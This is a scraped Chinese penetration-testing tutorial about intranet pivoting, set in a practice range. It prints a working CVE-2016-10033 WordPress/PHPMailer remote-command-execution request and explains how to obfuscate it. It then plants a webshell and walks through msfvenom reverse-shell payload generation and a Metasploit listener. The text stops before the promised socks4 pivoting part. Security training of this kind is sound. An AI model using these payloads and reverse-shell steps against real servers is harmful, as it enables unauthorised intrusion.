”什么是内网穿透“详解


”什么是内网穿透“详解

文章插图
 
在平时护网比赛中,攻坚环境中,渗透测试中,做内网穿透使用的工具有很多如:EW、Cobalt Strike 为了方便小白入门,本次教程通过渗透过程中最常用的MSF攻击框架中socks4做内网穿透代理,实现内网横向渗透 。
用本公司的靶场,模拟一个攻坚小场景:
外网IP:112.115.*.* (一台存在wordPress/ target=_blank class=infotextkey>WordPress漏洞的web服务器)
内网:10.0.0.0/24 (模拟开发人员,一台为weblogic漏洞机器,一台为thinkphp漏洞机器)
渗透思路:用MSF对wordpress漏洞进行反弹shell,发现机器位于一个内网,建立socks4线路,横向扫描并对内网其他机器进行渗透并反弹shell
由于socks4做穿透超过3层就会失去流量速度,所以后期我会写一篇用EW或其他穿透工具做多网段多层穿透 。
攻击机:kali
目标机:攻坚靶场
首先开启kali,利用Wordpress 4.6 任意命令执行漏洞,对主站服务器进行上传一句话或,直接反弹shell(为了一些教会小白一些提权细节,所以先写入一句话,然后在反弹msf shell)如果自己练习,可以直接msf生成shellcode扔到主站反弹shell 。
0x001 主站渗透
打开主站http://122.115.*.*:8000/介绍一下这个漏洞
”什么是内网穿透“详解

文章插图
 
WordPress <= 4.6命令执行漏洞(PHPMailer)(CVE-2016-10033)WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站 。也可以把WordPress用作一个内容管理系统(CMS)来使用 。WordPress使用PHPMailer组件向用户发送邮件 。PHPMailer(版本<5.2.18)存在远程命令执行漏洞,攻击者只需轻松地构造出一个恶意邮箱地址,即可写入任意文件,从而造成远程命令执行的危害 。POC
假如目标地址为:http : //127.0.0.1 : 8000/
  1. 把下面的HTTP报文复制到BurpSuite Repeater中,单击Go按钮,填充目标IP和扩展(例如,IP填充127.0.0.1填充80)
POST /wp-login.php?action=lostpassword HTTP/1.1Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}vuln}} null)Connection: closeUser-Agent: Mozilla/5.0 (macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0Accept: */*Content-Length: 56Content-Type: Application/x-www-form-urlencodedwp-submit=Get+New+Password&redirect_to=&user_login=admin
  1. 访问:http : //127.0.0.1 :8000/ vuln
看到返回状态码为200代表已经成功创建了/var/www/html/vuln文件
可在发包之前访问该地址,会出现404
注意:
  1. 远程URL中不要有 http://
  2. 所有字母必须小写
  3. 所有/用${substr{0}{1}{$spool_directory}}代替
  4. 空格所有用${substr{10}{1}{$tod_log}}代替
先利用poc对主站写入一个vuln空白页面,测试漏洞
”什么是内网穿透“详解

文章插图
 

”什么是内网穿透“详解

文章插图
 
然后写入一句话
”什么是内网穿透“详解

文章插图
 
用中国蚁剑连接webshell,下一步准备msf生成一个shell
”什么是内网穿透“详解

文章插图
 

”什么是内网穿透“详解

文章插图
 
在linux系统下/var/tmp目录可以进行高权限反弹shell,打开新的一个终端输入"msfconsole"启动msf
”什么是内网穿透“详解

文章插图
 
新打开一个终端生成反弹shell命令
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
”什么是内网穿透“详解

文章插图
 
回到msf端口msf>use exploit/multi/handler ###监听msf>set payload linux/x86/meterpreter/reverse_tcp ###反弹shell模块msf>run ###开始监听
”什么是内网穿透“详解

文章插图
 
用webshell把生成的shell.elf上传到/var/tmp/目录下,chmod+x 提权(linux提权细节),在通过终端执行反弹shell


推荐阅读